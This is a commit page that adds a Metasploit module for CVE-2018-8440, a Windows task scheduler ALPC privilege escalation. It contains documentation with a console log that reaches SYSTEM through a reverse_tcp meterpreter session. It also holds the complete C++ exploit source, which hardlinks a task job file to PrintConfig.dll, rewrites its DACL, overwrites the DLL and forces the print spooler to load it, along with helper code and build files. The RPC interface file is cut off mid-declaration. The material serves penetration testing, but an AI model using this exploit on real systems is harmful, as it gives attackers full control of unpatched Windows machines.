Land #10643, CVE-2018-8440 ALPC Scheduler

Merge branch 'land-10643' into upstream-master
4.x
bwatters-r7 2018-09-21 15:38:45 -05:00 committed by Metasploit
parent 456f7613cf
commit 2b194e2b47
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
20 changed files with 4965 additions and 0 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,89 @@
## Description
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to `.job` files located in `c:\windows\tasks` because the scheduler does not use impersonation when checking this location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file.
WARNING:
The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
will be overwritten when the exploit runs.
This module has been tested against Windows 10 Pro x64.
## Vulnerable Application
Affected Windows OS versions and related patch details can be found in the [Microsoft Advisory for CVE-2018-8440](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440).
## Verification Steps
* Get a meterpreter session on Windows 10 x64
* `use exploit/windows/local/alpc_taskscheduler`
* `set session <session>`
* `set payload <payload>`
* `set lhost <lhost>`
* `run`
* Get a session as SYSTEM
## Scenarios
### Tested on Windows 10 Pro Version 1803 x64
```
msf5 > use exploit/windows/local/alpc_taskscheduler
msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136
lhost => 172.22.222.136
msf5 exploit(windows/local/alpc_taskscheduler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al... 172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
2 meterpreter x64/windows DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR 172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)
msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
session => 1
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444
[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
session => 2
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[*] Checking target...
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 6140 launched.
[*] Writing payload dll into process 6140 memory
[*] Reflectively injecting the exploit DLL into 6140...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-IPOGIJR
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
session => 3
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[*] Checking target...
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) >
```

View File

@ -0,0 +1,41 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.40629.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ALPC-TaskSched-LPE", "ALPC-TaskSched-LPE\ALPC-TaskSched-LPE.vcxproj", "{E75DCF6C-9B6D-49C8-96D7-0003C127B449}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|ARM = Debug|ARM
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|ARM = Release|ARM
Release|Win32 = Release|Win32
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|ARM.ActiveCfg = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|Win32.ActiveCfg = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|Win32.Build.0 = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.ActiveCfg = Debug|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.Build.0 = Debug|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.ActiveCfg = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.Build.0 = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|ARM.ActiveCfg = Release|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|Win32.ActiveCfg = Release|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|Win32.Build.0 = Release|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.ActiveCfg = Release|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.Build.0 = Release|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.ActiveCfg = Release|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AA32DEA9-85D3-447D-820E-C6ACA3AD0CBD}
EndGlobalSection
EndGlobal

View File

@ -0,0 +1,151 @@
//***************************************************************//
// Windows LPE - Non-admin/Guest to system - by SandboxEscaper //
//***************************************************************//
/* _SchRpcSetSecurity which is part of the task scheduler ALPC endpoint allows us to set an arbitrary DACL.
It will Set the security of a file in c:\windows\tasks without impersonating, a non-admin (works from Guest too) user can write here.
Before the task scheduler writes the DACL we can create a hard link to any file we have read access over.
This will result in an arbitrary DACL write.
This PoC will overwrite a printer related dll and use it as a hijacking vector. This is ofcourse one of many options to abuse this.*/
#include "stdafx.h"
#include "rpc_h.h"
#include <xpsprint.h>
#include <fstream>
#pragma comment(lib, "rpcrt4.lib")
using namespace std;
//extern "C" __declspec (dllexport) DWORD CALLBACK ExploitThread(LPVOID);
RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle)
{
RPC_STATUS status;
RPC_BINDING_HANDLE v5;
RPC_SECURITY_QOS SecurityQOS = {};
RPC_WSTR StringBinding = nullptr;
RPC_BINDING_HANDLE Binding;
StringBinding = 0;
Binding = 0;
status = RpcStringBindingComposeW(L"c8ba73d2-3d55-429c-8e9a-c44f006f69fc", L"ncalrpc",
nullptr, nullptr, nullptr, &StringBinding);
if (status == RPC_S_OK)
{
status = RpcBindingFromStringBindingW(StringBinding, &Binding);
RpcStringFreeW(&StringBinding);
if (!status)
{
SecurityQOS.Version = 1;
SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;
status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS);
if (!status)
{
v5 = Binding;
Binding = 0;
*binding_handle = v5;
}
}
}
if (Binding)
RpcBindingFree(&Binding);
return status;
}
extern "C" void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len)
{
return(malloc(len));
}
extern "C" void __RPC_USER midl_user_free(void __RPC_FAR * ptr)
{
free(ptr);
}
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);
void RunExploit()
{
RPC_BINDING_HANDLE handle;
RPC_STATUS status = CreateBindingHandle(&handle);
//These two functions will set the DACL on an arbitrary file (see hardlink in main), change the security descriptor string parameters if needed.
_SchRpcCreateFolder(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0);
_SchRpcSetSecurity(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0);
}
int mainf(LPVOID lpReserved)
{
//We enumerate the path of PrintConfig.dll, which we will write the DACL of and overwrite to hijack the print spooler service
//You might want to expand this code block with FindNextFile .. as there may be multiple prnms003.inf_amd64* folders since older versions do not get cleaned up it in some rare cases.
//When this happens this code has no garantuee that it will target the dll that ends up getting loaded... and you really want to avoid this.
WIN32_FIND_DATA FindFileData;
HANDLE hFind;
wchar_t searchLoc[MAX_PATH], prntCnfg[MAX_PATH];
UINT szPath = 0, szPath1 = 0;
szPath = GetSystemDirectory(searchLoc, MAX_PATH);
szPath1 = GetSystemDirectory(prntCnfg, MAX_PATH);
if (szPath == 0 || szPath1 == 0){
return (-1);
}
wcscat(searchLoc, L"\\DriverStore\\FileRepository\\prnms003.inf_amd64*");
wcscat(prntCnfg, L"\\DriverStore\\FileRepository\\");
hFind = FindFirstFile(searchLoc, &FindFileData);
wchar_t PrinterDriverFolder[MAX_PATH];
wchar_t EndPath[23] = L"\\Amd64\\PrintConfig.dll";
wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName));
FindClose(hFind);
wcscat(prntCnfg, PrinterDriverFolder);
wcscat(prntCnfg, EndPath);
//Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of
wchar_t jobPath[MAX_PATH];
szPath = GetSystemWindowsDirectory(jobPath, MAX_PATH);
if (szPath == 0){
return (-1);
}
wcscat(jobPath, L"\\tasks\\UpdateTask.job");
CreateNativeHardlink(jobPath, prntCnfg);
RunExploit();
MEMORY_BASIC_INFORMATION lpBuffer;
VirtualQuery(lpReserved, &lpBuffer, sizeof(MEMORY_BASIC_INFORMATION));
//We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue
HANDLE hFile;
DWORD dwBytesWritten = 0;
do {
hFile = CreateFile(prntCnfg, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(hFile, (char*)lpBuffer.AllocationBase, (DWORD)lpBuffer.RegionSize, &dwBytesWritten, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
Sleep(5000);
}
} while (hFile == INVALID_HANDLE_VALUE);
CloseHandle(hFile);
//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.
CoInitialize(nullptr);
IXpsOMObjectFactory *xpsFactory = NULL;
CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast<LPVOID*>(&xpsFactory));
HANDLE completionEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
IXpsPrintJob *job = NULL;
IXpsPrintJobStream *jobStream = NULL;
StartXpsPrintJob(L"Microsoft XPS Document Writer", L"Print Job 1", NULL, NULL, completionEvent, NULL, 0, &job, &jobStream, NULL);
// jobStream->Close();
CoUninitialize();
return 0;
}
DWORD CALLBACK ExploitThread(LPVOID lpReserved)
{
mainf(lpReserved);
FreeLibraryAndExitThread(GetModuleHandle(NULL), 0);
return 0;
}

View File

@ -0,0 +1,55 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="ntimports.h">
<Filter>Source Files</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="rpc_h.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="PocStorSvc.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="rpc_c.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Hardlink.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="dllmain.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<Midl Include="rpc.idl">
<Filter>Source Files</Filter>
</Midl>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Resource.rc" />
</ItemGroup>
<ItemGroup>
<None Include="..\x64\Release\exploit.dll" />
</ItemGroup>
</Project>

View File

@ -0,0 +1,174 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{E75DCF6C-9B6D-49C8-96D7-0003C127B449}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Poc_StorSvc</RootNamespace>
<WindowsTargetPlatformVersion>10.0.16299.0</WindowsTargetPlatformVersion>
<ProjectName>ALPC-TaskSched-LPE</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<IncludePath>..\..\..\..\ReflectiveDLLInjection\common;$(IncludePath)</IncludePath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>false</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>xpsprint.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="..\..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
<ClInclude Include="..\..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
<ClInclude Include="ntimports.h" />
<ClInclude Include="rpc_h.h" />
<ClInclude Include="stdafx.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
<ClCompile Include="ALPC-TaskSched-LPE.cpp" />
<ClCompile Include="dllmain.cpp" />
<ClCompile Include="Hardlink.cpp" />
<ClCompile Include="rpc_c.c">
<RuntimeLibrary Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">MultiThreadedDLL</RuntimeLibrary>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
</ClCompile>
<ClCompile Include="stdafx.cpp" />
</ItemGroup>
<ItemGroup>
<Midl Include="rpc.idl" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

View File

@ -0,0 +1,106 @@
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "stdafx.h"
#include "ntimports.h"
#include "typed_buffer.h"
#include <string>
std::wstring BuildFullPath(const std::wstring& path, bool native)
{
std::wstring ret;
WCHAR buf[MAX_PATH];
if (native)
{
ret = L"\\??\\";
}
if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0)
{
ret += buf;
}
else
{
ret += path;
}
return ret;
}
FARPROC GetProcAddressNT(LPCSTR lpName)
{
return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
}
HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
{
UNICODE_STRING name = { 0 };
OBJECT_ATTRIBUTES obj_attr = { 0 };
DEFINE_NTDLL(RtlInitUnicodeString);
DEFINE_NTDLL(NtOpenFile);
if (path)
{
fRtlInitUnicodeString(&name, path);
InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
}
else
{
InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
}
HANDLE h = nullptr;
IO_STATUS_BLOCK io_status = { 0 };
NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
if (NT_SUCCESS(status))
{
return h;
}
else
{
return nullptr;
}
}
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname)
{
std::wstring full_linkname = BuildFullPath(linkname, true);
size_t len = full_linkname.size() * sizeof(WCHAR);
typed_buffer_ptr<FILE_LINK_INFORMATION> link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR));
memcpy(&link_info->FileName[0], full_linkname.c_str(), len);
link_info->ReplaceIfExists = TRUE;
link_info->FileNameLength = len;
std::wstring full_targetname = BuildFullPath(targetname, true);
HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0);
if (hFile)
{
DEFINE_NTDLL(ZwSetInformationFile);
IO_STATUS_BLOCK io_status = { 0 };
NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation);
CloseHandle(hFile);
if (NT_SUCCESS(status))
{
return true;
}
}
return false;
}

View File

@ -0,0 +1,23 @@
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
DWORD CALLBACK ExploitThread(LPVOID hModule);
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(NULL, 0, ExploitThread, lpReserved, 0, NULL);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

View File

@ -0,0 +1,51 @@
#pragma once
#include <Windows.h>
#include <winternl.h>
#define DIRECTORY_QUERY 0x0001
#define DIRECTORY_TRAVERSE 0x0002
#define DIRECTORY_CREATE_OBJECT 0x0004
#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008
#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something);
typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength);
typedef NTSTATUS(NTAPI* _NtOpenFile)(
_Out_ PHANDLE FileHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG ShareAccess,
_In_ ULONG OpenOptions
);
const ULONG FileLinkInformation = 11;
typedef struct _FILE_LINK_INFORMATION {
BOOLEAN ReplaceIfExists;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
typedef NTSTATUS(__stdcall *_ZwSetInformationFile)(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ PVOID FileInformation,
_In_ ULONG Length,
_In_ ULONG FileInformationClass
);
typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status);
void SetNtLastError(NTSTATUS status);
#define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x)

View File

@ -0,0 +1,166 @@
import "oaidl.idl";
import "ocidl.idl";
[
uuid(86d35949-83c9-4044-b424-db363231fd0c),
version(1.0),
]
interface DefaultIfName
{
typedef struct Struct_18_t
{
[unique][string] wchar_t* StructMember0;
[unique][string] wchar_t* StructMember1;
long StructMember2;
}Struct_18_t;
typedef struct Struct_74_t
{
long StructMember0;
long StructMember1;
[unique][string] wchar_t* StructMember2;
[unique][string] wchar_t* StructMember3;
}Struct_74_t;
typedef struct Struct_144_t
{
long StructMember0;
short StructMember1;
short StructMember2;
byte StructMember3[8];
}Struct_144_t;
typedef struct Struct_246_t
{
short StructMember0;
short StructMember1;
short StructMember2;
short StructMember3;
short StructMember4;
short StructMember5;
short StructMember6;
short StructMember7;
}Struct_246_t;
long _SchRpcHighestVersion(
[out]long *arg_1);
long _SchRpcRegisterTask(
[in][unique][string] wchar_t* arg_1,
[in][string] wchar_t* arg_2,
[in]long arg_3,
[in][unique][string] wchar_t* arg_4,
[in]long arg_5,
[in]long arg_6,
[in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_6)] /* */ struct Struct_18_t* arg_7,
[out][ref][string] wchar_t** arg_8,
